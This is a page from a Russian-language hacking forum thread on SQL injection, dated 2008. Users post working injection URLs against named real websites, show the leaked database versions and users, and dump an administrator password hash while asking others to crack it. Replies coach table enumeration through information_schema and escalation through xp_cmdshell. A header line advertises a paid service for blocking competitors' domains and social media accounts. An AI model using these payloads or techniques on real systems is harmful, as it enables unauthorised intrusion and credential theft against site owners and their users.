УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 728 из 1242

728

Опции темы

Поиск в этой теме

Опции просмотра

#7271

31.12.2008, 05:58

spherics

Участник форума

Регистрация: 14.01.2008

Сообщений: 174

Провел на форуме:
800953

Репутация: 443

Пройдёмся по магазинчикам!

http://shopping.sify.com/shopping/category.php?pid=20282+union+select+1,2,concat_ws( 0x3a3a,version(),user(),database()),4/*&?vsv=MALLHPBOOKS

Database Version: 5.0.45-log
Database name: cms
User name: spfclogin@202.144.65.156

http://www.cafegadgets.com/advanced_search_result.php?keywords=d2&search_in_d escription=1&categories_id=&inc_subcat=1&manufactu rers_id=-94+union+select+concat_ws(0x3a3a,version(),user(), database())--

5.0.67-community-log
cafe_cafe@localhost
cafe_cafeindia Webstore

#7272

31.12.2008, 06:44

Octave_Parango

Познающий

Регистрация: 06.11.2008

Сообщений: 93

Провел на форуме:
349682

Репутация: 30

vladvk,
Правильно так:

Цитата:

http://www.carli.illinois.edu/reports/prodvett/indiv_prop.php?id=-40+union+select+1,2,3,4,5,6,concat(username,char(5 8),password),8,9,10,11,12,13,14,15,16+from+cms.cms _users+limit+0,1/*

#7273

31.12.2008, 11:25

Gemini12

Познающий

Регистрация: 24.12.2008

Сообщений: 54

Провел на форуме:
253038

Репутация: 9

Отправить сообщение для Gemini12 с помощью ICQ

Код:

http://line.kz/reviews/?cat=13&id=1+or+1=(SELECT+TOP+1+id+FROM+vacancy)--

Кто дальше сможет? ))

#7274

31.12.2008, 12:20

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Код:

http://www.amazingsportsphotos.com/shop/insertorder.cfm?CFID=3371&CFTOKEN=53570656+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--

5.0.67-community-nt-log

Код:

http://www.appointmentsatfive.com/insertorder.cfm?CFID=102&CFTOKEN=94729224+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--

5.0.67-community-nt-log

#7275

31.12.2008, 13:57

Gemini12

Познающий

Регистрация: 24.12.2008

Сообщений: 54

Провел на форуме:
253038

Репутация: 9

Цитата:

Сообщение от spherics

Пройдёмся по магазинчикам!

[B]http://shopping.sify.com/shopping/category.php?pid=20282+union+select+1,2,concat_ws( 0x3a3a,version(),user(),database()),4/*&?vsv=MALLHPBOOKS

Database Version: 5.0.45-log
Database name: cms
User name: spfclogin@202.144.65.156

Код:

http://shopping.sify.com/shopping/category.php?pid=20282+union+select+1,2,concat_ws(0x3a,userid,Name,Password,Email,Tel_Off,Tel_Res,Mobile,Enable,Creation_Date,Last_Mod_Date),4+from+User_Master+where+id='1'--

admin:F1A61D77BD363820BCAB7093B433360876BDDC34

хэш в пм плз, зарание спс

Да, и еще, кто админку нашел?

Последний раз редактировалось Gemini12; 31.12.2008 в 14:01..

#7276

31.12.2008, 14:53

ILYAtirtir

Участник форума

Регистрация: 25.04.2007

Сообщений: 176

Провел на форуме:
1957988

Репутация: 739

Отправить сообщение для ILYAtirtir с помощью ICQ

Цитата:

Сообщение от Gemini12

Код:

http://line.kz/reviews/?cat=13&id=1+or+1=(SELECT+TOP+1+id+FROM+vacancy)--

Кто дальше сможет? ))

Дальше смотришь все таблицы в information_schema.

Цитата:

http://line.kz/reviews/?cat=13&id=1+or+1=(SELECT+TOP+1+table_name+from+in formation_schema.tables)--

Цитата:

Microsoft OLE DB Provider for SQL Server ошибка '80040e07'

Syntax error converting the nvarchar value 'tbl_comps' to a column of data type int.

/reviews/default.asp, line 40

Чтобы дальше смотреть используем NOT+IN

Цитата:

http://line.kz/reviews/?cat=13&id=1+or+1=(SELECT+TOP+1+table_name+from+in formation_schema.tables+where+table_name+NOT+IN('t bl_comps'))--

Ну и так дальше.

#7277

31.12.2008, 14:59

Gemini12

Познающий

Регистрация: 24.12.2008

Сообщений: 54

Провел на форуме:
253038

Репутация: 9

Цитата:

Сообщение от ILYAtirtir

Дальше смотришь все таблицы в information_schema.

Чтобы дальше смотреть используем NOT+IN

Ну и так дальше.

умный да? я это уже использовал, как думаешь я дошел до 'vacancy'...

#7278

31.12.2008, 18:00

ILYAtirtir

Участник форума

Регистрация: 25.04.2007

Сообщений: 176

Провел на форуме:
1957988

Репутация: 739

system_user "sa",значит дальше можно попробывать выполнить команды,xp_cmdshell итд

#7279

31.12.2008, 18:09

Gemini12

Познающий

Регистрация: 24.12.2008

Сообщений: 54

Провел на форуме:
253038

Репутация: 9

Цитата:

Сообщение от ILYAtirtir

system_user "sa",значит дальше можно попробывать выполнить команды,xp_cmdshell итд

А прав хватит?

#7280

31.12.2008, 19:03

R1dex

Участник форума

Регистрация: 17.09.2008

Сообщений: 211

Провел на форуме:
1571865

Репутация: 571

Отправить сообщение для R1dex с помощью ICQ

"Дайвинг-клуб Мегадайв"

Код:

http://megadive.ru/index.php?p=5&ti=-1+union+select+1,2,3,version(),5,6,7,8,9,10--

Страница 728 из 1242

728

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход